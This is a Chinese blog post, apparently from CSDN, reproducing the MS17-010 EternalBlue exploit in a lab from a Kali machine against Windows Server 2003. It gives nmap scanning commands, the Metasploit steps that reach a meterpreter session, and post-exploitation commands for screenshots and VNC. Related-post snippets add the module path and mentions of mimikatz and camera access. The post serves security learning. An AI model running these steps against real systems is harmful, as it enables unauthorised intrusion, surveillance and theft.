【ms17-010】永恒之蓝漏洞复现

最新推荐文章于 2025-03-04 15:00:38 发布
最新推荐文章于 2025-03-04 15:00:38 发布
阅读量2.4k 收藏 6
点赞数
分类专栏: 漏洞复现 文章标签: 服务器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/129951295
版权

【ms17-010】永恒之蓝漏洞复现

准备工作

  • 攻击机:kali,ip:192.168.56.128
  • 靶机:windows server 2003,ip:192.168.56.132
  • 工具:nmap(扫描)、msf

漏洞利用

首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况

nmap -sS 192.168.56.0/24
/24是子网掩码1的的位数,代表有24个一,其余8位为0,即:255.255.255.0
image-20230403210537347

此时已经扫描出来了,ip为:192.168.56.132的主机开启,并且显示了开放的端口号。

然后我们可以使用:

nmap -p 1-1000 192.168.56.132

去扫描该主机端口从1-1000的开放情况

image-20230403210805406

可以看到开放了如下端口:

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

接着我们使用命令去扫描该主机的操作系统类型:

nmap -O 192.168.56.132

image-20230403210947500

查询出来操作系统为:win2003

分析了相关信息后,我们就可以使用nmap自带的脚本去扫描该主机上的漏洞了:

nmap --script=vuln 192.168.56.132

image-20230403211305483

这里扫描出来了两个漏洞,ms17-010就是永恒之蓝漏洞

我们已经使用nmap扫描出来了漏洞,接着我们需要使用工具利用漏洞

这里我们选择 Metasploit Framework(MSF)

Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具

因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。

kali上,我们使用 msfconsole,进入这个工具:

image-20230403211728408

由于我们在上面已经知道了永恒之蓝编号:(ms17-010)

所以我们在msf中可以使用search命令去搜索相关漏洞:

search ms17-010

image-20230403211939359

然后我们使用use命令,去选择相关模块:

use 1   # 我们选择一号模块,可以远程执行代码

image-20230403212241273

然后我们使用命令:show options,显示配置项

image-20230403212524030

此处我们设置一下RHOSTS(靶机的ip地址),使用set命令

set RHOSTS 192.168.56.132

image-20230403212657048

设置完成之后,就可以开始攻击了,使用run或者exploit

image-20230403212854960

运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

这个时候我们已经成功了,远程命令执行。

我们使用screenshot命令,获取靶机的屏幕截图

image-20230403213126511

还可以使用远程桌面命令:

run vnc

image-20230403213317977

help命令可以查看可以使用哪些命令

image-20230403213453081

反弹shell

image-20230403213829861
Ms17-010永恒之蓝漏洞复现
千寻的博客
01-04 1678
Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2807
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
永恒之蓝检测工具MS17-010漏洞扫描工具
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,及时更新,以免勒索病毒入侵。
ms17-010永恒之蓝)渗透实战
最新发布
2301_80161123的博客
03-04 620
永恒之蓝是著名的操作系统漏洞,SMB Server远程代码执行漏洞,Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
探索永恒之蓝MS17-010漏洞利用工具推荐
gitblog_00187的博客
09-14 714
探索永恒之蓝MS17-010漏洞利用工具推荐 AutoBlue-MS17-010 项目地址: https://gitcode.com/gh_mirrors/au/AutoBlue-MS17-010 ...
永恒之蓝漏洞复现测试
m0_60547686的博客
08-12 449
永恒之蓝MS17-010漏洞复现及利用 一、什么是永恒之蓝永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。 SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 二、复现
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2301
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
MS17-010永恒之蓝漏洞复现
weixin_65224093的博客
04-04 366
1、概述:永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1288
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
永恒之蓝ms17010漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
永恒之蓝漏洞扫描工具官方版
08-06
可以批量扫描局域网内存在永恒之蓝漏洞工具,比某安工具强大N倍
网络安全必学渗透测试流程
qq_44005305的博客
02-12 703
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
ms17-010
qq_54735393的博客
11-02 425
EhernalBlue通过Tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只需要开机上网,攻击者就能在电脑和服务器中植入勒索软件。
永恒之蓝 MS17-010
weixin_43726831的博客
11-19 869
WIN7系统永恒之蓝漏洞-打开摄像头、录音、视频监控、截屏 前章: 安全漏洞的分析与利用 PTES渗透测试执行标准 1.简介 永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国...
[永恒之蓝]实战-漏洞复现
dzqxwzoe的博客
01-05 298
在这里插入图片描述](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bf14b5b946b44c268c0c133b32846438~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image" style=“margin: auto” />2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击" style=“margin: auto” />
利用MSF工具MS17-010进行漏洞复现
weixin_63200026的博客
07-07 916
关于MS17-010永恒之蓝漏洞的实验,使用MSF进行漏洞复现
ms17-010永恒之蓝漏洞复现与处理
06-06
对于 ms17-010永恒之蓝漏洞复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞。 2. 下载漏洞利用工具:可以使用 Metasploit 框架中的 exploit/windows/smb/ms17_010_eternalblue 模块进行漏洞利用。也可以使用其他的漏洞利用工具。 3. 进行漏洞利用:使用漏洞利用工具对目标系统进行攻击,获取目标系统的权限。 4. 处理漏洞:可以通过升级系统补丁或者关闭 SMB 服务来修复该漏洞。 总的来说,处理 ms17-010永恒之蓝漏洞需要及时进行漏洞扫描和修复,以避免被黑客攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值